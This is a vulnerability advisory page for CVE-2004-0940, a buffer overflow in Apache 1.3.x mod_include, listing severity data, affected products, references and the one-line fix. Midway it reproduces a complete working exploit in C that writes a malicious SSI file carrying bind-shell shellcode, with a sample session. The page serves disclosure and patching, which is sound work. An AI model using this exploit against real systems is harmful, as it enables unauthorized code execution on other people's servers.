CVE-2004-0940
CVSS 6.9
Published: 2005-02-09 00:00:00
Last revised: 2016-10-17 22:50:02

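[Original text] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.


[CNNVD] Apache mod_include local buffer overflow vulnerability (CNNVD-200502-029)

        mod_include is a standard Apache module that lets users include files, execute commands and so on from within HTML.
        get_tag() in mod_include does not adequately filter user-supplied input, and a local attacker can exploit this to carry out a buffer overflow attack.
        The problem is a buffer overflow in the get_tag() function, which an attacker can trigger from the handle_echo() function. A local user can create a specially crafted HTML file which, when Apache processes it, may execute arbitrary code with the privileges of the httpd child process.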

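- CVSS (base score)

CVSS score: 6.9 [MEDIUM]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)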

cpe:/a:apache:http_server:1.3.26 - Apache Software Foundation Apache HTTP Server 1.3.26
cpe:/o:slackware:slackware_linux:9.1 - Slackware Linux 9.1
cpe:/a:apache:http_server:1.3.27 - Apache Software Foundation Apache HTTP Server 1.3.27
cpe:/a:apache:http_server:1.3.28 - Apache Software Foundation Apache HTTP Server 1.3.28
cpe:/o:trustix:secure_linux:1.5 - Trustix Secure Linux 1.5
cpe:/a:apache:http_server:1.3.29 - Apache Software Foundation Apache HTTP Server 1.3.29
cpe:/a:apache:http_server:1.3.22 - Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.23 - Apache Software Foundation Apache HTTP Server 1.3.23
cpe:/o:slackware:slackware_linux:8.1 - Slackware Linux 8.1
cpe:/o:slackware:slackware_linux:9.0 - Slackware Linux 9.0
cpe:/a:apache:http_server:1.3.24 - Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:http_server:1.3.25 - Apache Software Foundation Apache HTTP Server 1.3.25
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/a:openpkg:openpkg:current
cpe:/a:apache:http_server:1.3.19 - Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.9 - Apache Software Foundation Apache HTTP Server 1.3.9
cpe:/a:apache:http_server:1.3.31 - Apache Software Foundation Apache HTTP Server 1.3.31
cpe:/a:apache:http_server:1.3.32 - Apache Software Foundation Apache HTTP Server 1.3.32
cpe:/o:hp:hp-ux:11.11 - HP-UX 11.11
cpe:/o:slackware:slackware_linux:current
cpe:/a:apache:http_server:1.3.17 - Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.18 - Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.7::dev
cpe:/a:apache:http_server:1.3.11 - Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3.12 - Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:openpkg:openpkg:2.2 - OpenPKG 2.2
cpe:/a:openpkg:openpkg:2.1 - OpenPKG 2.1
cpe:/a:apache:http_server:1.3.14 - Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:openpkg:openpkg:2.0 - OpenPKG 2.0
cpe:/o:suse:suse_linux:8.1 - SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0 - SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0 - SuSE SuSE Linux 8.0
cpe:/a:apache:http_server:1.3.6 - Apache Software Foundation Apache HTTP Server 1.3.6
cpe:/o:slackware:slackware_linux:10.0 - Slackware Linux 10.0
cpe:/a:apache:http_server:1.3.20 - Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.4 - Apache Software Foundation Apache HTTP Server 1.3.4
cpe:/o:slackware:slackware_linux:8.0 - Slackware Linux 8.0
cpe:/o:hp:hp-ux:11.00 - HP-UX 11.00
cpe:/o:hp:hp-ux:11.22 - HP-UX 11i v1.6
cpe:/o:suse:suse_linux:9.2 - SuSE SuSE Linux 9.2
cpe:/a:apache:http_server:1.3.3 - Apache Software Foundation Apache HTTP Server 1.3.3
cpe:/o:hp:hp-ux:11.20 - HP-UX 11i v1.5
cpe:/a:apache:http_server:1.3 - Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:1.3.1 - Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/o:suse:suse_linux:8.2 - SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1 - SuSE SuSE Linux 9.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0940
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-029
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109906660225051&w=2
(UNKNOWN)  OPENPKG  OpenPKG-SA-2004.047
http://securitytracker.com/id?1011783
(UNKNOWN)  SECTRACK  1011783
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1
(UNKNOWN)  SUNALERT  102197
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.apacheweek.com/features/security-13
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-13
http://www.debian.org/security/2004/dsa-594
(UNKNOWN)  DEBIAN  DSA-594
http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
(UNKNOWN)  MANDRAKE  MDKSA-2004:134
http://www.redhat.com/support/errata/RHSA-2004-600.html
(UNKNOWN)  REDHAT  RHSA-2004:600
http://www.redhat.com/support/errata/RHSA-2005-816.html
(UNKNOWN)  REDHAT  RHSA-2005:816
http://www.securityfocus.com/bid/11471
(VENDOR_ADVISORY)  BID  11471
http://www.vupen.com/english/advisories/2006/0789
(UNKNOWN)  VUPEN  ADV-2006-0789
http://xforce.iss.net/xforce/xfdb/17785
(VENDOR_ADVISORY)  XF  apache-modinclude-bo(17785)

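- Vulnerability information

Apache mod_include local buffer overflow vulnerability
Medium risk  Buffer overflow
2005-02-09 00:00:00 2005-10-20 00:00:00
Local
        mod_include is a standard Apache module that lets users include files, execute commands and so on from within HTML.
        get_tag() in mod_include does not adequately filter user-supplied input, and a local attacker can exploit this to carry out a buffer overflow attack.
        The problem is a buffer overflow in the get_tag() function, which an attacker can trigger from the handle_echo() function. A local user can create a specially crafted HTML file which, when Apache processes it, may execute arbitrary code with the privileges of the httpd child process.

- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        http://httpd.apache.org/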

- Vulnerability information (587)

Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit (EDBID:587)
linux local
2004-10-21 Verified
0 xCrZx
N/A [click to download]
// milw0rm.com [2004-10-21]
		

- Vulnerability information (24694)

Apache 1.3.x mod_include Local Buffer Overflow Vulnerability (EDBID:24694)
linux local
2004-10-18 Verified
0 xCrZx
N/A [click to download]
source: http://www.securityfocus.com/bid/11471/info

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. 

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                   *
 written by xCrZx                         /18.10.2004/                           *
 bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
 y0das old shao lin techniq ownz u :) remember my words                          *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/
 
/*********************************************************************************
 Technical Details:                                                              *
                                                                                 *
 there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
but this check can be skipped when [2] & [4] conditions will be occurred         *
at the same time without [3] condition.                                          *
                                                                                 *
So attacker can create malicious file to overflow static buffer, on              *
which tag points out and execute arbitrary code with privileges of               *
httpd child process.                                                             *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
                                                                                 *
*********************************************************************************/
 
/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/
 
/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/
 
/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/
 
/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
 
#define EVILBUF 8202
#define HTMLTEXT 1000
 
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
 
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

 
int main(int argc, char **argv) {
 
	char html[EVILBUF+HTMLTEXT];
	char evilbuf[EVILBUF+1];
 
	//can be changed
	char shellcode[] =
 
    // bind shell on 52986 port 
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
 
    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */
 
 
	char NOP[] = "\x90\x40";             // special nops ;)
	char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)
 
	int padding,xpad=0;
	int i,fd;
	long ret=0xbfff8688;
 
	if(argc>1) ret=strtoul(argv[1],0,16);
	else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
 
	padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
 
	while(1) {
		if(padding%2==0) { padding/=2; break;}
		else {padding--;xpad++;}
	}
 
	memset(html,0x0,sizeof html);
	memset(evilbuf,0x0,sizeof evilbuf);
 
	for(i=0;i<padding;i++)
		memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	for(i=0;i<xpad;i++)
		memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

 
	memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	*(long*)&evilbuf[strlen(evilbuf)]=ret;
 
	sprintf(html,HTML_FORMAT,evilbuf);
 
	printf("%s",html);
 
	return 0;
}		

- Vulnerability information (F34887)

apache_1.3.33.tar.gz (PacketStormID:F34887)
2004-10-29 00:00:00
 
unix
CVE-2004-0492,CVE-2004-0940
[click to download]

Apache is the most popular webserver on the Internet, quite possibly the best in terms of security, functionality, efficiency, and speed.

- Vulnerability information

11003
Apache HTTP Server mod_include get_tag() Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.

- Timeline

2004-10-21 2004-10-18
2004-10-24 Unknown

- Solution

Upgrade to Apache version 1.3.33 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): In the get_tag() function (mod_include.c), the following line should be changed from: if (t - tag == tagbuf_len) { to if (t - tag >= tagbuf_len-1) {
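
The effect of the one-line change above can be checked with a small model of the get_tag() copy loop quoted on this page. This is an added example, not code from mod_include or from the exploit author: `copy_tag_value`, `demo_overrun`, the string input that stands in for GET_CHAR, and the `strict` flag are hypothetical names, and the input is a constructed pattern of ordinary bytes with no payload. The quoted check [1] itself writes the terminator at offset tagbuf_len, so the model treats any higher offset as out of bounds.

```c
#include <stdio.h>
#include <string.h>

#define ARENA 512   /* oversized backing store: the model never writes outside memory it owns */

enum tag_status { TAG_OK, TAG_TOO_LONG, TAG_EOF, TAG_BAD_INPUT };

struct tag_result {
    enum tag_status status;
    int max_index;        /* highest offset from `tag` that was written */
    char value[ARENA];    /* stands in for the tag buffer plus whatever follows it */
};

/* Record a write through t and remember the highest offset touched. */
#define PUT(ch) do { *t = (ch); \
        if ((int)(t - tag) > r.max_index) r.max_index = (int)(t - tag); } while (0)

/* Model (assumption, not Apache source) of the quoted-value loop shown on the page.
 * `in` holds the bytes after the opening quote, `term` is that quote character.
 * strict == 0: original check  (t - tag == tagbuf_len)
 * strict == 1: proposed check  (t - tag >= tagbuf_len - 1)                      */
static struct tag_result copy_tag_value(const char *in, char term,
                                        int tagbuf_len, int strict)
{
    struct tag_result r;
    size_t n = strlen(in), pos = 0;
    char *tag, *t, c;
    int off;

    memset(&r, 0, sizeof r);
    r.max_index = -1;
    if (tagbuf_len < 2 || n + 2 > ARENA) { r.status = TAG_BAD_INPUT; return r; }
    tag = t = r.value;

    for (;;) {
        if (pos >= n) { r.status = TAG_EOF; return r; }    /* GET_CHAR at end of file */
        c = in[pos++];
        off = (int)(t - tag);
        if (strict ? (off >= tagbuf_len - 1) : (off == tagbuf_len)) {   /* [1] */
            PUT('\0');
            r.status = TAG_TOO_LONG;
            return r;
        }
        if (c == '\\') {
            PUT(c); t++;                                    /* [2] */
            if (pos >= n) { r.status = TAG_EOF; return r; }
            c = in[pos++];
            if (c == term) { --t; PUT(c); }                 /* [3] */
        }
        else if (c == term) {
            break;
        }
        PUT(c); t++;                                        /* [4] */
    }
    PUT('\0');
    r.status = TAG_OK;
    return r;
}

/* Constructed input: tagbuf_len-1 ordinary bytes, one backslash followed by a
 * non-terminator byte, then 40 more ordinary bytes and no closing quote.
 * With the original check, t steps from tagbuf_len-1 to tagbuf_len+1 in one
 * iteration, so the equality test at [1] never matches again. */
static int demo_overrun(int tagbuf_len, int strict)
{
    char in[ARENA];
    int plain = tagbuf_len - 1;

    if (tagbuf_len < 2 || plain + 2 + 40 + 2 > ARENA) return -1;
    memset(in, 'A', (size_t)plain);
    in[plain] = '\\';
    in[plain + 1] = 'B';
    memset(in + plain + 2, 'C', 40);
    in[plain + 42] = '\0';
    return copy_tag_value(in, '"', tagbuf_len, strict).max_index;
}

int main(void)
{
    int len = 16;
    printf("tagbuf_len=%d original check: highest index written = %d\n",
           len, demo_overrun(len, 0));
    printf("tagbuf_len=%d proposed check: highest index written = %d\n",
           len, demo_overrun(len, 1));
    return 0;
}
```

With plain input the original equality check still stops at offset tagbuf_len; only the two-step advance through [2] and [4] carries the pointer past it, which is why the replacement uses an inequality with one byte of headroom.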

- Related references

- Credit

- Vulnerability information

Apache mod_include Local Buffer Overflow Vulnerability
Boundary Condition Error 11471
No Yes
2004-10-20 12:00:00 2006-08-16 04:35:00
Discovery of this issue is credited to Crazy Einstein <crazy_einstein@yahoo.com>.

- Affected software versions

Trustix Secure Linux 1.5
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux 8.0
Slackware Linux -current
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
RedHat Stronghold 4.0
OpenPKG OpenPKG 2.2
OpenPKG OpenPKG 2.1
OpenPKG OpenPKG 2.0
OpenPKG OpenPKG Current
IBM HTTP Server 1.3.28 .1
IBM HTTP Server 1.3.28
IBM HTTP Server 1.3.26 .2
IBM HTTP Server 1.3.26 .1
IBM HTTP Server 1.3.26
IBM HTTP Server 1.3.19 .5
IBM HTTP Server 1.3.19 .4
IBM HTTP Server 1.3.19 .3
IBM HTTP Server 1.3.19 .2
IBM HTTP Server 1.3.19 .1
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM HTTP Server 1.3.12 .7
IBM HTTP Server 1.3.12 .6
IBM HTTP Server 1.3.12 .5
IBM HTTP Server 1.3.12 .4
- IBM AIX 4.3.3
- IBM AIX 5.1
- RedHat Linux 7.1
- S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12 .3
- HP HP-UX 11.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM HTTP Server 1.3.12 .2
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.3
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- Sun Solaris 2.6
- Turbolinux Turbolinux 6.0
IBM HTTP Server 1.3.12 .1
IBM HTTP Server 1.3.12
IBM HTTP Server 1.3.6 win32
IBM HTTP Server 1.3.6 .4 win32
IBM HTTP Server 1.3.6 .3
- Caldera OpenLinux 2.2
- IBM AIX 4.2.1
- Microsoft Windows NT 4.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- Sun Solaris 2.6
- Turbolinux Turbolinux 3.0.1
IBM HTTP Server 1.3.6 .2 win32
IBM HTTP Server 1.3.6 .2 unix
IBM HTTP Server 1.3.3 win32
IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for pSeries 3.3.2
IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for iSeries 3.3.2
HP Webproxy A.02.10
+ HP HP-UX B.11.04
HP Webproxy A.02.00
HP VirtualVault A.04.70
+ HP HP-UX B.11.04
HP VirtualVault A.04.60
+ HP HP-UX B.11.04
HP VirtualVault A.04.50
+ HP HP-UX B.11.04
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.00
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Communication Manager 2.0.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 2.0
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.3.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Apache Software Foundation Apache 1.3.32
+ Gentoo Linux 1.4
+ Gentoo Linux
Apache Software Foundation Apache 1.3.31
+ OpenPKG OpenPKG Current
Apache Software Foundation Apache 1.3.29
+ Apple Mac OS X 10.3.5
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X Server 10.3.5
+ Apple Mac OS X Server 10.2.7
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
Apache Software Foundation Apache 1.3.28
+ Conectiva Linux 8.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenBSD OpenBSD 3.4
+ OpenPKG OpenPKG 1.3
Apache Software Foundation Apache 1.3.27
+ HP HP-UX (VVOS) 11.0 4
+ HP VirtualVault 4.6
+ HP VirtualVault 4.5
+ HP Webproxy 2.0
+ Immunix Immunix OS 7+
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenBSD OpenBSD 3.3
+ OpenPKG OpenPKG Current
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ SGI IRIX 6.5.19
Apache Software Foundation Apache 1.3.26
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.25
Apache Software Foundation Apache 1.3.24
Apache Software Foundation Apache 1.3.23
- IBM AIX 4.3
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.22
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Apache 1.3.18
Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.14
+ EnGarde Secure Linux 1.0.1
- MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
Apache Software Foundation Apache 1.3.12
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ OpenBSD OpenBSD 2.8
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
